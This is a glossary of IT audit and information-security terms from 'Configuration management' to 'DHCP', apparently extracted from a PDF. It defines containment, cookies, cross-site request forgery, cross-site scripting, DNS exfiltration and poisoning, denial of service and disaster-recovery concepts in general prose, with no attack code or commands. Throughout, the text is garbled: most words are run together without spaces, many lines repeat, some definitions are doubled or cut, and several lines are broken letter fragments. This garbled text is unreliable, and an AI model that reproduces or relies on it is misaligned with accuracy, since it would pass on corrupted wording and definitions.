Thecontrolofchangestoasetofconfigurationitemsoverasystemlifecycle
management
Consolelog Anautomateddetailreportofcomputersystemactivity
Consulted InaRACI(responsible,accountable,consulted,informed)chart,referstothosepeoplewhose
opinionsaresoughtonanactivity(twowaycommunication)
Consumerization Anewmodelinwhichemergingtechnologiesarefirstembracedbytheconsumermarketand
laterspreadtothebusiness
Containment Actionstakentolimitexposureafteranincidenthasbeenidentifiedandconfirmed Containment Actionstakentolimitexposureafteranincidenthasbeenidentifiedandconfirmed
Contentfiltering Controllingaccesstoanetworkbyanalyzingthecontentsoftheincomingandoutgoing
packetsandeitherlettingthempassordenyingthembasedonalistofrules
ScopeNote:Differsfrompacketfilteringinthatitisthedatainthepacketthatareanalyzed
insteadoftheattributesofthepacketitself(e.g.,source/targetIPaddress,transmission
controlprotocol[TCP]flags) controlprotocol[TCP]flags)
Context Theoverallsetofinternalandexternalfactorsthatmightinfluenceordeterminehowan
enterprise,entity,processorindividualacts
ScopeNote:Contextincludes:
technologycontext(technologicalfactorsthataffectanenterprise'sabilitytoextractvalue
fromdata) )
datacontext(dataaccuracy,availability,currencyandquality)
skillsandknowledge(generalexperienceandanalytical,technicalandbusinessskills),
organizationalandculturalcontext(politicalfactorsandwhethertheenterpriseprefersdata
tointuition)
strategiccontext(strategicobjectivesoftheenterprise)
COBIT5perspective
Contingencyplan Aplanusedbyanenterpriseorbusinessunittorespondtoaspecificsystemsfailureor
disruption
Contingencyplanning Processofdevelopingadvancearrangementsandproceduresthatenableanenterpriseto
respondtoaneventthatcouldoccurbychanceorunforeseencircumstances.
Continuity Preventing,mitigatingandrecoveringfromdisruption
ScopeNote:Theterms"businessresumptionplanning,""disasterrecoveryplanning"and
"contingencyplanning"alsomaybeusedinthiscontext;theyallconcentrateontherecovery
aspectsofcontinuity.
Continuous auditing This approach allows IS auditors to monitor system reliability on a continuous basis and to Continuousauditing
approach
ThisapproachallowsISauditorstomonitorsystemreliabilityonacontinuousbasisandto
gatherselectiveauditevidencethroughthecomputer.
Continuous
availability
Nonstopservice,withnolapseinservice;thehighestlevelofserviceinwhichnodowntimeis
allowed
Term Definition
Continuous
improvement
Thegoalsofcontinuousimprovement(Kaizen)includetheeliminationofwaste,definedas
"activities that add cost but do not add value;" justintime (JIT) delivery; production load improvement activitiesthataddcost,butdonotaddvalue; justintime(JIT)delivery;productionload
levelingofamountsandtypes;standardizedwork;pacedmovinglines;andrightsized
equipment
ScopeNote:AcloserdefinitionoftheJapaneseusageofKaizenis"totakeitapartandputit
backtogetherinabetterway."Whatistakenapartisusuallyaprocess,system,productor
service Kaizen is a daily activity whose purpose goes beyond improvement It is also a process service.Kaizenisadailyactivitywhosepurposegoesbeyondimprovement.Itisalsoaprocess
that,whendonecorrectly,humanizestheworkplace,eliminateshardwork(bothmentaland
physical),andteachespeoplehowtodorapidexperimentsusingthescientificmethodand
howtolearntoseeandeliminatewasteinbusinessprocesses.
Control Themeansofmanagingrisk,includingpolicies,procedures,guidelines,practicesor
organizationalstructures,whichcanbeofanadministrative,technical,management,orlegal g , , , g , g
nature.
ScopeNote:Alsousedasasynonymforsafeguardorcountermeasure.
SeealsoInternalcontrol.
Controlcenter Hoststherecoverymeetingswheredisasterrecoveryoperationsaremanaged
Controlframework Asetoffundamentalcontrolsthatfacilitatesthedischargeofbusinessprocessowner
responsibilitiestopreventfinancialorinformationlossinanenterprise
Controlgroup Membersoftheoperationsareawhoareresponsibleforthecollection,loggingand
submissionofinputforthevarioususergroups
Controlobjective Astatementofthedesiredresultorpurposetobeachievedbyimplementingcontrol
proceduresinaparticularprocess
C t l Obj ti f A di i d t th t t t " t i d l" f i t l ControlObjectivesfor
Enterprise
Governance
Adiscussiondocumentthatsetsoutan"enterprisegovernancemodel"focusingstronglyon
boththeenterprisebusinessgoalsandtheinformationtechnologyenablersthatfacilitate
goodenterprisegovernance,publishedbytheInformationSystemsAuditandControl
Foundationin1999.
Controlperimeter Theboundarydefiningthescopeofcontrolauthorityforanentity
Scope Note: For example if a system is within the control perimeter the right and ability exist ScopeNote:Forexample,ifasystemiswithinthecontrolperimeter,therightandabilityexist
tocontrolitinresponsetoanattack.
Controlpractice Keycontrolmechanismthatsupportstheachievementofcontrolobjectivesthrough
responsibleuseofresources,appropriatemanagementofriskandalignmentofITwith
business
Controlrisk Theriskthatamaterialerrorexiststhatwouldnotbepreventedordetectedonatimelybasis
by the system of internal controls (See Inherent risk) bythesystemofinternalcontrols(SeeInherentrisk)
Controlriskself
assessment
Amethod/processbywhichmanagementandstaffofalllevelscollectivelyidentifyand
evaluateriskandcontrolswiththeirbusinessareas.Thismaybeundertheguidanceofa
facilitatorsuchasanauditororriskmanager.
Term Definition
Controlsection Theareaofthecentralprocessingunit(CPU)thatexecutessoftware,allocatesinternal
memory and transfers operations between the arithmeticlogic internal storage and output memoryandtransfersoperationsbetweenthearithmeticlogic,internalstorageandoutput
sectionsofthecomputer
Controlweakness Adeficiencyinthedesignoroperationofacontrolprocedure.Controlweaknessescan
potentiallyresultinriskrelevanttotheareaofactivitynotbeingreducedtoanacceptable
level(relevantriskthreatensachievementoftheobjectivesrelevanttotheareaofactivity
beingexamined).Controlweaknessescanbematerialwhenthedesignoroperationofoneor
more control procedures does not reduce to a relatively low level the risk that misstatements morecontrolproceduresdoesnotreducetoarelativelylowleveltheriskthatmisstatements
causedbyillegalactsorirregularitiesmayoccurandnotbedetectedbytherelatedcontrol
procedures.
Cookie Amessagekeptinthewebbrowserforthepurposeofidentifyingusersandpossiblypreparing
customizedwebpagesforthem
ScopeNote:Thefirsttimeacookieisset,ausermayberequiredtogothrougharegistration ScopeNote:Thefirsttimeacookieisset,ausermayberequiredtogothrougharegistration
process.Subsequenttothis,wheneverthecookie'smessageissenttotheserver,acustomized
viewbasedonthatuser'spreferencescanbeproduced.Thebrowser'simplementationof
cookieshas,however,broughtseveralsecurityconcerns,allowingbreachesofsecurityandthe
theftofpersonalinformation(e.g.,userpasswordsthatvalidatetheuseridentityandenable
restricted web services).
Corporateexchange Anexchangeratethatcanbeusedoptionallytoperformforeigncurrencyconversion.The
rate corporateexchangerateisgenerallyastandardmarketratedeterminedbyseniorfinancial
managementforusethroughouttheenterprise.
Corporategovernance Thesystembywhichenterprisesaredirectedandcontrolled.Theboardofdirectorsis
responsibleforthegovernanceoftheirenterprise.Itconsistsoftheleadershipand
organizationalstructuresandprocessesthatensuretheenterprisesustainsandextends
strategiesandobjectives.
C t it R ibl f di ti th l i d l t i l t ti i t d Corporatesecurity
officer(CSO)
Responsibleforcoordinatingtheplanning,development,implementation,maintenanceand
monitoringoftheinformationsecurityprogram
Correctivecontrol Designedtocorrecterrors,omissionsandunauthorizedusesandintrusions,oncetheyare
detected
COSO CommitteeofSponsoringOrganizationsoftheTreadwayCommission
Scope Note: Its 1992 report "Internal Control Integrated Framework" is an internationally ScopeNote:Its1992report"InternalControlIntegratedFramework"isaninternationally
acceptedstandardforcorporategovernance.Seewww.coso.org.
Countermeasure Anyprocessthatdirectlyreducesathreatorvulnerability
Term Definition
Coupling Measureofinterconnectivityamongstructureofsoftwareprograms.
Couplingdependsontheinterfacecomplexitybetweenmodules.Thiscanbedefinedasthe
pointatwhichentryorreferenceismadetoamodule,andwhatdatapassacrossthe
interface.
ScopeNote:Inapplicationsoftwaredesign,itispreferabletostriveforthelowestpossible
coupling between modules Simple connectivity among modules results in software that is couplingbetweenmodules.Simpleconnectivityamongmodulesresultsinsoftwarethatis
easiertounderstandandmaintainandislesspronetoarippleordominoeffectcausedwhen
errorsoccuratonelocationandpropagatethroughthesystem.
Coverage Theproportionofknownattacksdetectedbyanintrusiondetectionsystem(IDS)
Crack To"breakinto"or"getaround"asoftwareprogram
ScopeNote:Forexample,therearecertainnewsgroupsthatpostserialnumbersforpirated
versionsofsoftware.Acrackermaydownloadthisinformationinanattempttocrackthe
programsohe/shecanuseit.Itiscommonlyusedinthecaseofcracking(unencrypting)a
passwordorothersensitivedata.
Credentialedanalysis Invulnerabilityanalysis,passivemonitoringapproachesinwhichpasswordsorotheraccess
credentialsarerequired
ScopeNote:Usuallyinvolvesaccessingasystemdataobject
Criteria Thestandardsandbenchmarksusedtomeasureandpresentthesubjectmatterandagainst
whichanISauditorevaluatesthesubjectmatter
ScopeNote:Criteriashouldbe:Objectivefreefrombias,Measurableprovideforconsistent
measurement,Completeincludeallrelevantfactorstoreachaconclusion,Relevantrelateto
thesubjectmatter
Inanattestationengagement,benchmarksagainstwhichmanagement'swrittenassertionon
thesubjectmattercanbeevaluated.Thepractitionerformsaconclusionconcerningsubject
matter by referring to suitable criteria.
Critical functions Business activities or information that could not be interrupted or unavailable for several Criticalfunctions Businessactivitiesorinformationthatcouldnotbeinterruptedorunavailableforseveral
businessdayswithoutsignificantlyjeopardizingoperationoftheenterprise
Criticalinfrastructure Systemswhoseincapacityordestructionwouldhaveadebilitatingeffectontheeconomic
securityofanenterprise,communityornation.
Criticalsuccessfactor
(CSF)
ThemostimportantissueoractionformanagementtoachievecontroloverandwithinitsIT
processes
Criticality The importance of a particular asset or function to the enterprise and the impact if that asset Criticality Theimportanceofaparticularassetorfunctiontotheenterprise,andtheimpactifthatasset
orfunctionisnotavailable
Criticalityanalysis Ananalysistoevaluateresourcesorbusinessfunctionstoidentifytheirimportancetothe
enterprise,andtheimpactifafunctioncannotbecompletedoraresourceisnotavailable
Term Definition
Crosscertification Acertificateissuedbyonecertificateauthority(CA)toasecondCAsothatusersofthefirst
certification authority are able to obtain the public key of the second CA and verify the certificationauthorityareabletoobtainthepublickeyofthesecondCAandverifythe
certificatesithascreated
ScopeNote:OftenreferstocertificatesissuedtoeachotherbytwoCAsatthesamelevelina
hierarchy
Crosssiterequest
forgery (CSRF)
Atypeofmaliciousexploitofawebsitewherebyunauthorizedcommandsaretransmitted
from a user that the web site trusts (also known as a oneclick attack or session riding); forgery(CSRF) fromauserthatthewebsitetrusts(alsoknownasaone clickattackorsessionriding);
acronympronounced"seasurf"
Crosssitescripting
(XSS)
Atypeofinjection,inwhichmaliciousscriptsareinjectedintootherwisebenignandtrusted
websites
ScopeNote:Crosssitescripting(XSS)attacksoccurwhenanattackerusesawebapplication
tosendmaliciouscode,generallyintheformofabrowsersidescript,toadifferentenduser. tosendmaliciouscode,generallyintheformofabrowsersidescript,toadifferentenduser.
Flawsthatallowtheseattackstosucceedarequitewidespreadandoccuranywhereaweb
applicationusesinputfromauserwithintheoutputitgenerateswithoutvalidatingor
encodingit.(OWASP)
Cryptography Theartofdesigning,analyzingandattackingcryptographicschemes
Cryptosystem Apairofalgorithmsthattakeakeyandconvertplaintexttociphertextandback
Culture Apatternofbehaviors,beliefs,assumptions,attitudesandwaysofdoingthings
Customerrelationship
management(CRM)
Awaytoidentify,acquireandretaincustomers.CRMisalsoanindustrytermforsoftware
solutionsthathelpanenterprisemanagecustomerrelationshipsinanorganizedmanner.
Cybercop Aninvestigatorofactivitiesrelatedtocomputercrime
C b i A ti iti d t d i th f it b i liti t h l t fi d Cyberespionage Activitiesconductedinthenameofsecurity,business,politicsortechnologytofind
informationthatoughttoremainsecret.Itisnotinherentlymilitary.
Cybersecurity Theprotectionofinformationassetsbyaddressingthreatstoinformationprocessed,stored,
andtransportedbyinternetworkedinformationsystems
Cybersecurity
architecture
Describesthestructure,componentsandtopology(connectionsandlayout)ofsecurity
controlswithinanenterprise'sITinfrastructure
ScopeNote:Thesecurityarchitectureshowshowdefenseindepthisimplementedandhow
layersofcontrolarelinkedandisessentialtodesigningandimplementingsecuritycontrolsin
anycomplexenvironment.
Cyberwarfare Activitiessupportedbymilitaryorganizationswiththepurposetothreatthesurvivalandwell
beingofsociety/foreignentity
Damage evaluation The determination of the extent of damage that is necessary to provide for an estimation of Damageevaluation Thedeterminationoftheextentofdamagethatisnecessarytoprovideforanestimationof
therecoverytimeframeandthepotentiallosstotheenterprise
Dashboard Atoolforsettingexpectationsforanenterpriseateachlevelofresponsibilityandcontinuous
monitoringoftheperformanceagainstsettargets
Term Definition
Dataanalysis Typicallyinlargeenterprisesinwhichtheamountofdataprocessedbytheenterpriseresource
planning (ERP) system is extremely voluminous analysis of patterns and trends proves to be planning(ERP)systemisextremelyvoluminous,analysisofpatternsandtrendsprovestobe
extremelyusefulinascertainingtheefficiencyandeffectivenessofoperations
ScopeNote:MostERPsystemsprovideopportunitiesforextractionandanalysisofdata(some
withbuiltintools)throughtheuseoftoolsdevelopedbythirdpartiesthatinterfacewiththe
ERPsystems.
Dataclassification Theassignmentofalevelofsensitivitytodata(orinformation)thatresultsinthespecification
ofcontrolsforeachlevelofclassification.Levelsofsensitivityofdataareassignedaccordingto
predefinedcategoriesasdataarecreated,amended,enhanced,storedortransmitted.The
classificationlevelisanindicationofthevalueorimportanceofthedatatotheenterprise.
Dataclassification Anenterpriseschemeforclassifyingdatabyfactorssuchascriticality,sensitivityand
scheme
p y g y y, y
ownership
Datacommunications Thetransferofdatabetweenseparatecomputerprocessingsites/devicesusingtelephone
lines,microwaveand/orsatellitelinks
Datacustodian Theindividual(s)anddepartment(s)responsibleforthestorageandsafeguardingof
computerizeddata
Datadictionary Adatabasethatcontainsthename,type,rangeofvalues,sourceandauthorizationforaccess
foreachdataelementinadatabase.
Italsoindicateswhichapplicationprogramsusethosedatasothatwhenadatastructureis
contemplated,alistoftheaffectedprogramscanbegenerated
ScopeNote:Maybeastandaloneinformationsystemusedformanagementor
documentationpurposes,oritmaycontroltheoperationofadatabase
Datadiddling Changingdatawithmaliciousintentbeforeorduringinputintothesystem
DataEncryption
Standard(DES)
Analgorithmforencodingbinarydata
ScopeNote:ItisasecretkeycryptosystempublishedbytheNationalBureauofStandards
(NBS),thepredecessoroftheUSNationalInstituteofStandardsandTechnology(NIST).DES
d it i t h b l d b th Ad d E ti St d d (AES) anditsvariantshasbeenreplacedbytheAdvancedEncryptionStandard(AES)
Dataflow Theflowofdatafromtheinput(inInternetbanking,ordinarilyuserinputathis/herdesktop)
tooutput(inInternetbanking,ordinarilydatainabankscentraldatabase)
Dataflowincludestravelthroughthecommunicationlines,routers,switchesandfirewallsas
well as processing through various applications on servers which process the data from user wellasprocessingthroughvariousapplicationsonservers,whichprocessthedatafromuser
fingerstostorageinabank'scentraldatabase.
Dataintegrity Thepropertythatdatameetwithapriorityexpectationofqualityandthatthedatacanbe
reliedon
Dataleakage Siphoningoutorleakinginformationbydumpingcomputerfilesorstealingcomputerreports
andtapes
Term Definition
Datanormalization Astructuredprocessfororganizingdataintotablesinsuchawaythatitpreservesthe
relationships among the data relationshipsamongthedata
Dataowner Theindividual(s),normallyamanagerordirector,whohasresponsibilityfortheintegrity,
accuratereportinganduseofcomputerizeddata
Dataretention Referstothepoliciesthatgoverndataandrecordsmanagementformeetinginternal,legal
andregulatorydataarchivalrequirements
Datasecurity Thosecontrolsthatseektomaintainconfidentiality,integrityandavailabilityofinformation
Datastructure Therelationshipsamongfilesinadatabaseandamongdataitemswithineachfile
Datawarehouse Agenerictermforasystemthatstores,retrievesandmanageslargevolumesofdata
ScopeNote:Datawarehousesoftwareoftenincludessophisticatedcomparisonandhashing
techniquesforfastsearchesaswellasforadvancedfiltering.
Database Astoredcollectionofrelateddataneededbyenterprisesandindividualstomeettheir y p
informationprocessingandretrievalrequirements
Database
administrator(DBA)
Anindividualordepartmentresponsibleforthesecurityandinformationclassificationofthe
shareddatastoredonadatabasesystem
Thisresponsibilityincludesthedesign,definitionandmaintenanceofthedatabase.
Database Asoftwaresystemthatcontrolstheorganization,storageandretrievalofdatainadatabase
managementsystem
(DBMS)
Databasereplication Theprocessofcreatingandmanagingduplicateversionsofadatabase
ScopeNote:Replicationnotonlycopiesadatabasebutalsosynchronizesasetofreplicasso
thatchangesmadetoonereplicaarereflectedinalloftheothers.Thebeautyofreplicationis
thatitenablesmanyuserstoworkwiththeirownlocalcopyofadatabase,buthavethe
databaseupdatedasiftheywereworkingonasinglecentralizeddatabase.Fordatabase
applicationsinwhich,geographicallyusersaredistributedwidely,replicationisoftenthemost
efficientmethodofdatabaseaccess.
Database
specifications
Thesearetherequirementsforestablishingadatabaseapplication.Theyincludefield
definitions,fieldrequirementsandreportingrequirementsfortheindividualinformationinthe
database database.
Datagram Apacket(encapsulatedwithaframecontaininginformation),thatistransmittedinapacket
switchingnetworkfromsourcetodestination
Dataoriented
systemsdevelopment
Focusesonprovidingadhocreportingforusersbydevelopingasuitableaccessibledatabaseof
informationandtoprovideuseabledataratherthanafunction
Decentralization The process of distributing computer processing to different locations within an enterprise Decentralization Theprocessofdistributingcomputerprocessingtodifferentlocationswithinanenterprise
Decisionsupport
systems(DSS)
Aninteractivesystemthatprovidestheuserwitheasyaccesstodecisionmodelsanddata,to
supportsemistructureddecisionmakingtasks
Term Definition
Decryption Atechniqueusedtorecovertheoriginalplaintextfromtheciphertextsothatitisintelligibleto
the reader thereader
Thedecryptionisareverseprocessoftheencryption.
Decryptionkey Adigitalpieceofinformationusedtorecoverplaintextfromthecorrespondingciphertextby
decryption
Default Acomputersoftwaresettingorpreferencethatstateswhatwillautomaticallyhappeninthe
event that the user has not stated another preference eventthattheuserhasnotstatedanotherpreference
Forexample,acomputermayhaveadefaultsettingtolaunchorstartNetscapewhenevera
GIFfileisopened;however,ifusingAdobePhotoshopisthepreferenceforviewingaGIFfile,
thedefaultsettingcanbechangedtoPhotoshop.Inthecaseofdefaultaccounts,theseare
accountsthatareprovidedbytheoperatingsystemvendor(e.g.,rootinUNIX).
Defaultdenypolicy Apolicywherebyaccessisdeniedunlessitisspecificallyallowed;theinverseofdefaultallow
Defaultpassword Thepasswordusedtogainaccesswhenasystemisfirstinstalledonacomputerornetwork
device
ScopeNote:ThereisalargelistpublishedontheInternetandmaintainedatseverallocations.
Failuretochangetheseaftertheinstallationleavesthesystemvulnerable.
Defenseindepth Thepracticeoflayeringdefensestoprovideaddedprotection
Defenseindepthincreasessecuritybyraisingtheeffortneededinanattack.Thisstrategy
placesmultiplebarriersbetweenanattackerandanenterprise'scomputingandinformation
resources.
D Th li ti f i bl l l f lt ti t f th f d ti i Degauss Theapplicationofvariablelevelsofalternatingcurrentforthepurposeofdemagnetizing
magneticrecordingmedia
ScopeNote:Theprocessinvolvesincreasingthealternatingcurrentfieldgraduallyfromzero
tosomemaximumvalueandbacktozero,leavingaverylowresidueofmagneticinductionon
themedia.Degausslooselymeanstoerase.
Demilitarized zone A screened (firewalled) network segment that acts as a buffer zone between a trusted and Demilitarizedzone
(DMZ)
Ascreened(firewalled)networksegmentthatactsasabufferzonebetweenatrustedand
untrustednetwork
ScopeNote:ADMZistypicallyusedtohousesystemssuchaswebserversthatmustbe
accessiblefrombothinternalnetworksandtheInternet.
Demodulation Theprocessofconvertingananalogtelecommunicationssignalintoadigitalcomputersignal
Demographic Afactdeterminedbymeasuringandanalyzingdataaboutapopulation;itreliesheavilyon
surveyresearchandcensusdata.
Denialofservice
attack(DoS)
Anassaultonaservicefromasinglesourcethatfloodsitwithsomanyrequeststhatit
becomesoverwhelmedandiseitherstoppedcompletelyoroperatesatasignificantlyreduced
rate
Term Definition
Depreciation Theprocessofcostallocationthatassignstheoriginalcostofequipmenttotheperiods
benefited benefited
ScopeNote:Themostcommonmethodofcalculatingdepreciationisthestraightline
method,whichassumesthatassetsshouldbewrittenoffinequalamountsovertheirlives.
DetailedIScontrols Controlsovertheacquisition,implementation,deliveryandsupportofISsystemsandservices
made up of application controls plus those general controls not included in pervasive controls madeupofapplicationcontrolsplusthosegeneralcontrolsnotincludedinpervasivecontrols
Detectionrisk TheriskthattheISauditorassuranceprofessionalssubstantiveprocedureswillnotdetectan
errorthatcouldbematerial,individuallyorincombinationwithothererrors
ScopeNote:Seeauditrisk
Detectiveapplication Designedtodetecterrorsthatmayhaveoccurredbasedonpredefinedlogicorbusinessrules pp
controls
g y p g
Usuallyexecutedafteranactionhastakenplaceandoftencoveragroupoftransactions
Detectivecontrol Existstodetectandreportwhenerrors,omissionsandunauthorizedusesorentriesoccur
Device Agenerictermforacomputersubsystem,suchasaprinter,serialportordiskdrive
Adevicefrequentlyrequiresitsowncontrollingsoftware,calledadevicedriver.
Dialback Usedasacontroloverdialuptelecommunicationslines.Thetelecommunicationslink
establishedthroughdialupintothecomputerfromaremotelocationisinterruptedsothe
computercandialbacktothecaller.Thelinkispermittedonlyifthecalleriscallingfroma
l d h b l h l validphonenumberortelecommunicationschannel.
Dialinaccesscontrol Preventsunauthorizedaccessfromremoteuserswhoattempttoaccessasecured
environment
Rangesfromadialbackcontroltoremoteuserauthentication
Digitalcertificate Apieceofinformation,adigitizedformofsignature,thatprovidessenderauthenticity,
message integrity and non repudiation A digital signature is generated using the senders messageintegrityandnonrepudiation.Adigitalsignatureisgeneratedusingthesenders
privatekeyorapplyingaonewayhashfunction.
Digitalcertification Aprocesstoauthenticate(orcertify)apartysdigitalsignature;carriedoutbytrustedthird
parties
Digitalcodesigning Theprocessofdigitallysigningcomputercodetoensureitsintegrity
Digitalforensics Theprocessofidentifying,preserving,analyzingandpresentingdigitalevidenceinamanner
that is legally acceptable in any legal proceedings thatislegallyacceptableinanylegalproceedings
Digitalsignature Apieceofinformation,adigitizedformofsignature,thatprovidessenderauthenticity,
messageintegrityandnonrepudiation
Adigitalsignatureisgeneratedusingthesendersprivatekeyorapplyingaonewayhash
function.
Term Definition
Directreporting
engagement
Anengagementinwhichmanagementdoesnotmakeawrittenassertionaboutthe
effectiveness of their control procedures and an IS auditor provides an opinion about subject engagement effectivenessoftheircontrolproceduresandanISauditorprovidesanopinionaboutsubject
matterdirectly,suchastheeffectivenessofthecontrolprocedures
Disaster 1.Asudden,unplannedcalamitouseventcausinggreatdamageorloss.Anyeventthatcreates
aninabilityonanenterprise'sparttoprovidecriticalbusinessfunctionsforsome
predeterminedperiodoftime.Similartermsarebusinessinterruption,outageand
catastrophe.
2.Theperiodwhenenterprisemanagementdecidestodivertfromnormalproduction
responsesandexercisesitsdisasterrecoveryplan(DRP).Ittypicallysignifiesthebeginningofa
movefromaprimarylocationtoanalternatelocation.
Disasterdeclaration Thecommunicationtoappropriateinternalandexternalpartiesthatthedisasterrecoveryplan
(DRP)isbeingputintooperation
Disasternotification Thefeethattherecoverysitevendorchargeswhenthecustomernotifiesthemthatadisaster
fee
y g
hasoccurredandtherecoverysiteisrequired
ScopeNote:Thefeeisimplementedtodiscouragefalsedisasternotifications.
Disasterrecovery Activitiesandprogramsdesignedtoreturntheenterprisetoanacceptablecondition
Theabilitytorespondtoaninterruptioninservicesbyimplementingadisasterrecoveryplan
(DRP)torestoreanenterprise'scriticalbusinessfunctions
Disasterrecoveryplan
(DRP)deskchecking
Typicallyareadthroughofadisasterrecoveryplan(DRP)withoutanyrealactionstakingplace
ScopeNote:Generallyinvolvesareadingoftheplan,discussionoftheactionitemsand
definitionofanygapsthatmightbeidentified
Di t l A t f h h i l t h i l d d l t ithi d fi d ti Disasterrecoveryplan
(DRP)
Asetofhuman,physical,technicalandproceduralresourcestorecover,withinadefinedtime
andcost,anactivityinterruptedbyanemergencyordisaster
Disasterrecoveryplan
(DRP)walkthrough
Generallyarobusttestoftherecoveryplanrequiringthatsomerecoveryactivitiestakeplace
andaretested
Adisasterscenarioisoftengivenandtherecoveryteamstalkthroughthestepsthatthey
ld d t t k t A t f th l ibl h ld b t t d wouldneedtotaketorecover.Asmanyaspectsoftheplanaspossibleshouldbetested
Disastertolerance ThetimegapduringwhichthebusinesscanacceptthenonavailabilityofITfacilities
Term Definition
Disclosurecontrols
and procedures
Theprocessesinplacedesignedtohelpensurethatallmaterialinformationisdisclosedbyan
enterprise in the reports that it files or submits to the U S Security and Exchange Commission andprocedures enterpriseinthereportsthatitfilesorsubmitstotheU.S.SecurityandExchangeCommission
(SEC)
ScopeNote:DisclosureControlsandProceduresalsorequirethatdisclosuresbeauthorized,
completeandaccurate,andrecorded,processed,summarizedandreportedwithinthetime
periodsspecifiedintheSECrulesandforms.Deficienciesincontrols,andanysignificant
changes to controls must be communicated to the enterprises audit committee and auditors changestocontrols,mustbecommunicatedtotheenterprise sauditcommitteeandauditors
inatimelymanner.Anenterprisesprincipalexecutiveofficerandfinancialofficermustcertify
theexistenceofthesecontrolsonaquarterlybasis.
Discountrate Aninterestrateusedtocalculateapresentvaluewhichmightormightnotincludethetime
valueofmoney,taxeffects,riskorotherfactors
Discoverysampling Aformofattributesamplingthatisusedtodetermineaspecifiedprobabilityoffindingatleast y p g p g p p y g
oneexampleofanoccurrence(attribute)inapopulation
Discretionaryaccess
control(DAC)
Ameansofrestrictingaccesstoobjectsbasedontheidentityofsubjectsand/orgroupsto
whichtheybelong
ScopeNote:Thecontrolsarediscretionaryinthesensethatasubjectwithacertainaccess
permissioniscapableofpassingthatpermission(perhapsindirectly)ontoanyothersubject. p p p g p p p y y j
Diskmirroring Thepracticeofduplicatingdatainseparatevolumesontwoharddiskstomakestoragemore
faulttolerant.Mirroringprovidesdataprotectioninthecaseofdiskfailurebecausedataare
constantlyupdatedtobothdisks.
Disklessworkstations AworkstationorPConanetworkthatdoesnothaveitsowndisk,butinsteadstoresfilesona
networkfileserver
Di t ib t d d t A t f t t d t th b i ti t k Distributeddata
processingnetwork
Asystemofcomputersconnectedtogetherbyacommunicationnetwork
ScopeNote:Eachcomputerprocessesitsdataandthenetworksupportsthesystemasa
whole.Suchanetworkenhancescommunicationamongthelinkedcomputersandallows
accesstosharedfiles.
Distributeddenialof
service attack (DDoS)
Adenialofservice(DoS)assaultfrommultiplesources
serviceattack(DDoS)
Term Definition
Diverserouting Themethodofroutingtrafficthroughsplitcablefacilitiesorduplicatecablefacilities
ScopeNote:Thiscanbeaccomplishedwithdifferentand/orduplicatecablesheaths.If
differentcablesheathsareused,thecablemaybeinthesameconduitand,therefore,subject
tothesameinterruptionsasthecableitisbackingup.Thecommunicationservicesubscriber
canduplicatethefacilitiesbyhavingalternateroutes,althoughtheentrancetoandfromthe
customerpremisesmaybeinthesameconduit.Thesubscribercanobtaindiverseroutingand
alternate routing from the local carrier including dual entrance facilities However acquiring alternateroutingfromthelocalcarrier,includingdualentrancefacilities.However,acquiring
thistypeofaccessistimeconsumingandcostly.Mostcarriersprovidefacilitiesforalternate
anddiverserouting,althoughthemajorityofservicesaretransmittedoverterrestrialmedia.
Thesecablefacilitiesareusuallylocatedinthegroundorbasement.Groundbasedfacilities
areatgreatriskduetotheaginginfrastructuresofcities.Inaddition,cablebasedfacilities
usuallyshareroomwithmechanicalandelectricalsystemsthatcanimposegreatriskdueto
human error and disastrous events human error and disastrous events
Domain InCOBIT,thegroupingofcontrolobjectivesintofourlogicalstagesinthelifecycleof
investmentsinvolvingIT(PlanandOrganise,AcquireandImplement,DeliverandSupport,and
MonitorandEvaluate)
Domainnamesystem
(DNS)
AhierarchicaldatabasethatisdistributedacrosstheInternetthatallowsnamestoberesolved
intoIPaddresses(andviceversa)tolocateservicessuchaswebandemailservers
Domainnamesystem
(DNS)exfiltration
TunnelingoverDNStogainnetworkaccess.Lowerlevelattackvectorforsimpletocomplex
datatransmission,slowbutdifficulttodetect.
Domainnamesystem
(DNS)poisoning
CorruptsthetableofanInternetserver'sDNS,replacinganInternetaddresswiththeaddress
ofanothervagrantorscoundreladdress
f b l k f h h h dd h d d b ScopeNote:Ifawebuserlooksforthepagewiththataddress,therequestisredirectedby
thescoundrelentryinthetabletoadifferentaddress.Cachepoisoningdiffersfromanother
formofDNSpoisoninginwhichtheattackerspoofsvalidemailaccountsandfloodsthe"in"
boxesofadministrativeandtechnicalcontacts.CachepoisoningisrelatedtoURLpoisoningor
locationpoisoning,inwhichanInternetuserbehavioristrackedbyaddinganidentification
numbertothelocationlineofthebrowserthatcanberecordedastheuservisitssuccessive
h i i l ll d S h i i h i i pagesonthesite.ItisalsocalledDNScachepoisoningorcachepoisoning.
Doubleloopstep Integratesthemanagementoftactics(financialbudgetsandmonthlyreviews)andthe
managementofstrategy
ScopeNote:Areportingsystem,basedonthebalancedscorecard(BSC),thatallowsprocess
to be monitored against strategy and corrective actions to be taken as required tobemonitoredagainststrategyandcorrectiveactionstobetakenasrequired
Downloading Theactoftransferringcomputerizedinformationfromonecomputertoanothercomputer
Downtimereport Areportthatidentifiestheelapsedtimewhenacomputerisnotoperatingcorrectlybecause
ofmachinefailure
Term Definition
Driver(valueandrisk) Adriverincludesaneventorotheractivitythatresultsintheidentificationofan
assurance/audit need assurance/auditneed
Drypipefire
extinguishersystem
Referstoasprinklersystemthatdoesnothavewaterinthepipesduringidleusage,unlikea
fullychargedfireextinguishersystemthathaswaterinthepipesatalltimes
ScopeNote:Thedrypipesystemisactivatedatthetimeofthefirealarmandwaterisemitted
tothepipesfromawaterreservoirfordischargetothelocationofthefire.
Dualcontrol Aprocedurethatusestwoormoreentities(usuallypersons)operatinginconcerttoprotecta Dualcontrol Aprocedurethatusestwoormoreentities(usuallypersons)operatinginconcerttoprotecta
systemresourcesothatnosingleentityactingalonecanaccessthatresource
Duecare Thelevelofcareexpectedfromareasonablepersonofsimilarcompetencyundersimilar
conditions
Duediligence Theperformanceofthoseactionsthataregenerallyregardedasprudent,responsibleand
necessarytoconductathoroughandobjectiveinvestigation,reviewand/oranalysis y g j g , / y
Dueprofessionalcare Diligencethataperson,whopossessesaspecialskill,wouldexerciseunderagivensetof
circumstances
Dumbterminal Adisplayterminalwithoutprocessingcapability
ScopeNote:Dumbterminalsaredependentonthemaincomputerforprocessing.Allentered
dataareacceptedwithoutfurthereditingorvalidation.
Duplexrouting Themethodorcommunicationmodeofroutingdataoverthecommunicationnetwork
Dynamicanalysis Analysisthatisperformedinarealtimeorcontinuousform
DynamicHost
Configuration
Protocol(DHCP)
Aprotocolusedbynetworkedcomputers(clients)toobtainIPaddressesandotherparameters
